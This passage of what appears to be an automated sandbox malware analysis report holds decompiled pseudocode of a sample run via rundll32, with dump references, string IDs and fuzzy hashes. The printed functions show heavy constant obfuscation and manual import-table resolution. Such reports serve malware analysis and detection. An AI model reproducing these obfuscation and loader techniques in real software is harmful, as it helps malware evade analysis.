                                                                                                                    				signed short* _t132;
                                                                                                                    				signed short _t133;
                                                                                                                    				intOrPtr _t134;
                                                                                                                    				void* _t135;
                                                                                                                    				void* _t136;
                                                                                                                    
                                                                                                                    				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                    				_push(_t134);
                                                                                                                    				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                    				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t91);
                                                                                                                    				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                    				_t136 = _t135 + 0x14;
                                                                                                                    				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                    				_t115 = 0x47;
                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                    				 *(_t136 + 0x28) = 0x411077;
                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                    				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                    				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                    				_t116 = 0x13;
                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                    				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                    				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                    				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                    				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                    				_t117 =  *(_t136 + 0x18);
                                                                                                                    				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                    				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                    				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                    					L13:
                                                                                                                    					return 1;
                                                                                                                    				} else {
                                                                                                                    					_t133 = _t128 + _t134;
                                                                                                                    					while(1) {
                                                                                                                    						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                    						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						_t121 = E0034CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                    						 *(_t136 + 0x18) = _t121;
                                                                                                                    						__eflags = _t121;
                                                                                                                    						if(_t121 == 0) {
                                                                                                                    							L15:
                                                                                                                    							return 0;
                                                                                                                    						}
                                                                                                                    						_t132 =  *_t133 + _t134;
                                                                                                                    						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                    						while(1) {
                                                                                                                    							_t108 =  *_t132;
                                                                                                                    							__eflags = _t108;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							if(__eflags >= 0) {
                                                                                                                    								_t110 = _t108 + 2 + _t134;
                                                                                                                    								__eflags = _t108 + 2 + _t134;
                                                                                                                    							} else {
                                                                                                                    								_t110 = _t108 & 0x0000ffff;
                                                                                                                    							}
                                                                                                                    							_t111 = E00336CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                    							_t136 = _t136 + 0x10;
                                                                                                                    							__eflags = _t111;
                                                                                                                    							if(_t111 == 0) {
                                                                                                                    								goto L15;
                                                                                                                    							} else {
                                                                                                                    								_t121 =  *(_t136 + 0x18);
                                                                                                                    								_t132 =  &(_t132[2]);
                                                                                                                    								 *_t113 = _t111;
                                                                                                                    								_t113 = _t113 + 4;
                                                                                                                    								__eflags = _t113;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t133 = _t133 + 0x14;
                                                                                                                    						__eflags = _t133;
                                                                                                                    					}
                                                                                                                    					goto L13;
                                                                                                                    				}
                                                                                                                    			}



















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: X^wE$c`
                                                                                                                    • API String ID: 0-1321574684
                                                                                                                    • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                    • Instruction ID: 8130f64fd278a012894faf1a5d6a115ae4eede8bf31627ccee0c298a2b8a376f
                                                                                                                    • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                    • Instruction Fuzzy Hash: 285184B15083029FC729DF24D88692BBBE1FFC4358F51891DF4869A221E371DA49CF96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 62%
                                                                                                                    			E00334C5D(intOrPtr _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				void* _t106;
                                                                                                                    				void* _t108;
                                                                                                                    				intOrPtr* _t109;
                                                                                                                    				signed int _t112;
                                                                                                                    				signed int _t113;
                                                                                                                    				signed int _t114;
                                                                                                                    				intOrPtr _t128;
                                                                                                                    
                                                                                                                    				_v44 = _v44 & 0x00000000;
                                                                                                                    				_v48 = 0xad4f7a;
                                                                                                                    				_v16 = 0xf18dbd;
                                                                                                                    				_v16 = _v16 + 0xffff4795;
                                                                                                                    				_v16 = _v16 << 0xe;
                                                                                                                    				_v16 = _v16 >> 6;
                                                                                                                    				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                    				_v12 = 0xaf5949;
                                                                                                                    				_v12 = _v12 | 0xe2d389df;
                                                                                                                    				_v12 = _v12 + 0x286;
                                                                                                                    				_t112 = 3;
                                                                                                                    				_v12 = _v12 / _t112;
                                                                                                                    				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                    				_v24 = 0x2aefd1;
                                                                                                                    				_t113 = 0x7d;
                                                                                                                    				_t128 = _a4;
                                                                                                                    				_v24 = _v24 * 0x59;
                                                                                                                    				_v24 = _v24 << 2;
                                                                                                                    				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                    				_v8 = 0x985427;
                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                    				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                    				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                    				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                    				_v28 = 0xa7f2b4;
                                                                                                                    				_v28 = _v28 >> 0xc;
                                                                                                                    				_v28 = _v28 + 0x7e4a;
                                                                                                                    				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                    				_v40 = 0x7087c6;
                                                                                                                    				_t114 = 0x69;
                                                                                                                    				_v40 = _v40 / _t113;
                                                                                                                    				_v40 = _v40 ^ 0x00014835;
                                                                                                                    				_v20 = 0xcde00b;
                                                                                                                    				_v20 = _v20 + 0xffffcf30;
                                                                                                                    				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                    				_v20 = _v20 + 0xfc2b;
                                                                                                                    				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                    				_v36 = 0x30875a;
                                                                                                                    				_v36 = _v36 * 0x47;
                                                                                                                    				_v36 = _v36 / _t114;
                                                                                                                    				_v36 = _v36 ^ 0x0028facf;
                                                                                                                    				_v32 = 0x6c449b;
                                                                                                                    				_v32 = _v32 >> 0xf;
                                                                                                                    				_v32 = _v32 + 0xffff12fc;
                                                                                                                    				_v32 = _v32 ^ 0xfff19483;
                                                                                                                    				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                    				_t134 = _t106;
                                                                                                                    				if(_t106 != 0) {
                                                                                                                    					_push(_v8);
                                                                                                                    					_push(_v24);
                                                                                                                    					_push(_v12);
                                                                                                                    					_t108 = E00348606(_v16, 0x331378, _t134);
                                                                                                                    					_push(_v20);
                                                                                                                    					_t130 = _t108;
                                                                                                                    					_push(_t108);
                                                                                                                    					_push(_v40);
                                                                                                                    					_t109 = E0033CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                    					if(_t109 != 0) {
                                                                                                                    						 *_t109();
                                                                                                                    					}
                                                                                                                    					E0033A8B0(_v36, _t130, _v32);
                                                                                                                    				}
                                                                                                                    				return 0;
                                                                                                                    			}






















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <,:q$J~
                                                                                                                    • API String ID: 0-951887683
                                                                                                                    • Opcode ID: 21d075f10f7372cf25674df88019a020d4031dbba8e76a8736e13827971d6d00
                                                                                                                    • Instruction ID: 63a184c8cc057fecfe08bf8607757df252042c143b94fba62b499c41ee2a911b
                                                                                                                    • Opcode Fuzzy Hash: 21d075f10f7372cf25674df88019a020d4031dbba8e76a8736e13827971d6d00
                                                                                                                    • Instruction Fuzzy Hash: 4D411E71D0130AABDF49CFA1C94AAEEBBB1FB54314F208159D410BA2A0D7B51B55CFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0033EE81(void* __eflags) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				char _v44;
                                                                                                                    				short _v48;
                                                                                                                    				short _v52;
                                                                                                                    				intOrPtr _v56;
                                                                                                                    				char _v576;
                                                                                                                    				intOrPtr* _t95;
                                                                                                                    				signed int _t99;
                                                                                                                    				signed int _t100;
                                                                                                                    
                                                                                                                    				_v56 = 0x3b8b1c;
                                                                                                                    				_v44 = 0;
                                                                                                                    				_v52 = 0;
                                                                                                                    				_v48 = 0;
                                                                                                                    				_v8 = 0xf9e323;
                                                                                                                    				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                    				_v8 = _v8 + 0x5b26;
                                                                                                                    				_v8 = _v8 ^ 0x387262e7;
                                                                                                                    				_v8 = _v8 ^ 0x4b076809;
                                                                                                                    				_v20 = 0x75aab0;
                                                                                                                    				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                    				_v20 = _v20 + 0x78e9;
                                                                                                                    				_v20 = _v20 ^ 0xc4737271;
                                                                                                                    				_v16 = 0xa8e87a;
                                                                                                                    				_v16 = _v16 + 0xffff799a;
                                                                                                                    				_t99 = 0x33;
                                                                                                                    				_v16 = _v16 / _t99;
                                                                                                                    				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                    				_v28 = 0x7feeb5;
                                                                                                                    				_v28 = _v28 + 0xffffe4f6;
                                                                                                                    				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                    				_v32 = 0x59c916;
                                                                                                                    				_t100 = 0x5d;
                                                                                                                    				_v32 = _v32 / _t100;
                                                                                                                    				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                    				_v12 = 0x866588;
                                                                                                                    				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                    				_v12 = _v12 + 0xffffbaa5;
                                                                                                                    				_v12 = _v12 ^ 0x68223e43;
                                                                                                                    				_v36 = 0xbafac2;
                                                                                                                    				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                    				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                    				_v24 = 0xc770cb;
                                                                                                                    				_v24 = _v24 >> 0xf;
                                                                                                                    				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                    				_v24 = _v24 ^ 0x956359d7;
                                                                                                                    				_v40 = 0xbd0b83;
                                                                                                                    				_v40 = _v40 >> 3;
                                                                                                                    				_v40 = _v40 ^ 0x001e2563;
                                                                                                                    				_t101 = _v8;
                                                                                                                    				if(E00348F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                    					_t95 =  &_v576;
                                                                                                                    					if(_v576 != 0) {
                                                                                                                    						while( *_t95 != 0x5c) {
                                                                                                                    							_t95 = _t95 + 2;
                                                                                                                    							if( *_t95 != 0) {
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    							}
                                                                                                                    							goto L6;
                                                                                                                    						}
                                                                                                                    						_t101 = 0;
                                                                                                                    						 *((short*)(_t95 + 2)) = 0;
                                                                                                                    					}
                                                                                                                    					L6:
                                                                                                                    					E0034DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                    				}
                                                                                                                    				return _v44;
                                                                                                                    			}





















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: C>"h$br8
                                                                                                                    • API String ID: 0-573140060
                                                                                                                    • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                    • Instruction ID: 87e33a298f30424f8c9349958a54c4894703588cf9f3b8124b68c3192269158d
                                                                                                                    • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                    • Instruction Fuzzy Hash: EF41F171C01219EBCF19CFE4C94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				unsigned int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				void* _t83;
                                                                                                                    				signed int _t85;
                                                                                                                    				signed int _t91;
                                                                                                                    
                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                    				_v48 = 0xea50c7;
                                                                                                                    				_v44 = 0x183406;
                                                                                                                    				_v8 = 0x4cb37c;
                                                                                                                    				_v8 = _v8 + 0xc736;
                                                                                                                    				_v8 = _v8 + 0xd4a7;
                                                                                                                    				_t91 = __edx;
                                                                                                                    				_t85 = 0x64;
                                                                                                                    				_v8 = _v8 * 0x2d;
                                                                                                                    				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                    				_v24 = 0x238f3e;
                                                                                                                    				_v24 = _v24 << 3;
                                                                                                                    				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                    				_v20 = 0x73abc8;
                                                                                                                    				_v20 = _v20 >> 3;
                                                                                                                    				_v20 = _v20 ^ 0x00035013;
                                                                                                                    				_v16 = 0x5012b6;
                                                                                                                    				_v16 = _v16 >> 0x10;
                                                                                                                    				_v16 = _v16 / _t85;
                                                                                                                    				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                    				_v12 = 0x8c34bb;
                                                                                                                    				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                    				_v12 = _v12 + 0xffff11fb;
                                                                                                                    				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                    				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                    				_v36 = 0xff820a;
                                                                                                                    				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                    				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                    				_v32 = 0x36506a;
                                                                                                                    				_v32 = _v32 + 0x4de;
                                                                                                                    				_v32 = _v32 ^ 0x003709b9;
                                                                                                                    				_v28 = 0x64fd3b;
                                                                                                                    				_v28 = _v28 + 0xffff3e7a;
                                                                                                                    				_v28 = _v28 ^ 0x00656766;
                                                                                                                    				if( *((intOrPtr*)(0x353210 + __edx * 4)) == 0) {
                                                                                                                    					_t83 = E00340A0E(_t85, _t85, _a4);
                                                                                                                    					_push(_v28);
                                                                                                                    					_push(_a12);
                                                                                                                    					_push(_v32);
                                                                                                                    					_push(_t83);
                                                                                                                    					 *((intOrPtr*)(0x353210 + _t91 * 4)) = E0033CDCD(_v12, _v36);
                                                                                                                    				}
                                                                                                                    				return  *((intOrPtr*)(0x353210 + _t91 * 4));
                                                                                                                    			}


















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fge$jP6
                                                                                                                    • API String ID: 0-775479084
                                                                                                                    • Opcode ID: 73c0522a7b609cca3d9fb336043a2f1c787997cd41cdd47b2cae852ec690eb70
                                                                                                                    • Instruction ID: 03ac8fb45da7a951246a12d8ad072576a51c0b27fb492a32d1800fb02659cb59
                                                                                                                    • Opcode Fuzzy Hash: 73c0522a7b609cca3d9fb336043a2f1c787997cd41cdd47b2cae852ec690eb70
                                                                                                                    • Instruction Fuzzy Hash: E531E0B1C00309EBCB49CFA4CA4A59EBBB5FB08308F108548D511B6220C3B95A49CF96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00350E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				void* _t61;
                                                                                                                    				intOrPtr _t66;
                                                                                                                    				void* _t73;
                                                                                                                    				intOrPtr* _t74;
                                                                                                                    
                                                                                                                    				_t74 = _a16;
                                                                                                                    				_push(_t74);
                                                                                                                    				_push(_a12);
                                                                                                                    				_t73 = __ecx;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t61);
                                                                                                                    				_v16 = 0x2b4f5d;
                                                                                                                    				_v16 = _v16 * 0x1c;
                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                    				_v16 = _v16 ^ 0x000abada;
                                                                                                                    				_v24 = 0x6f176d;
                                                                                                                    				_v24 = _v24 | 0x8892b5fd;
                                                                                                                    				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                    				_v12 = 0x9049ef;
                                                                                                                    				_v12 = _v12 >> 4;
                                                                                                                    				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                    				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                    				_a16 = 0x9c064;
                                                                                                                    				_a16 = _a16 + 0x4e6a;
                                                                                                                    				_a16 = _a16 + 0xffffd44e;
                                                                                                                    				_a16 = _a16 | 0x475ceb65;
                                                                                                                    				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                    				_v8 = 0xaf6c6f;
                                                                                                                    				_v8 = _v8 >> 6;
                                                                                                                    				_v8 = _v8 + 0xad29;
                                                                                                                    				_v8 = _v8 + 0xd52;
                                                                                                                    				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                    				_v20 = 0xd79f7b;
                                                                                                                    				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                    				_v20 = _v20 >> 5;
                                                                                                                    				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                    				E00340DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                    				E0033ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                    				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                    				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                    				return _t66;
                                                                                                                    			}













                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =.SG$]O+
                                                                                                                    • API String ID: 0-348654084
                                                                                                                    • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                    • Instruction ID: bc0abe7e65afe3ff2ad5141280fd234cb45d933abcb5e856a759655579765357
                                                                                                                    • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                    • Instruction Fuzzy Hash: D721167180120DEFCF45DFE4DA464AEBBB1FF45304F108559E91566225C3719B24DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 431132790-0
                                                                                                                    • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                    • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                    • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                    • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E0034044F() {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				char _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				void* _t309;
                                                                                                                    				intOrPtr _t310;
                                                                                                                    				void* _t311;
                                                                                                                    				intOrPtr _t321;
                                                                                                                    				intOrPtr _t325;
                                                                                                                    				void* _t329;
                                                                                                                    				signed int _t331;
                                                                                                                    				signed int _t332;
                                                                                                                    				signed int _t333;
                                                                                                                    				signed int _t334;
                                                                                                                    				signed int _t335;
                                                                                                                    				signed int _t336;
                                                                                                                    				signed int _t337;
                                                                                                                    				signed int _t338;
                                                                                                                    				signed int _t339;
                                                                                                                    				intOrPtr _t369;
                                                                                                                    				void* _t373;
                                                                                                                    				intOrPtr _t374;
                                                                                                                    				void* _t379;
                                                                                                                    				signed int* _t383;
                                                                                                                    
                                                                                                                    				_t383 =  &_v140;
                                                                                                                    				_v16 = 0x8f0e94;
                                                                                                                    				_v12 = 0x9bdfd3;
                                                                                                                    				_t329 = 0;
                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                    				_v4 = _v4 & 0;
                                                                                                                    				_v68 = 0xf0a33d;
                                                                                                                    				_v68 = _v68 ^ 0x64690d06;
                                                                                                                    				_v68 = _v68 >> 7;
                                                                                                                    				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                    				_v96 = 0x45a6c;
                                                                                                                    				_v96 = _v96 + 0xffff2947;
                                                                                                                    				_v96 = _v96 >> 0x10;
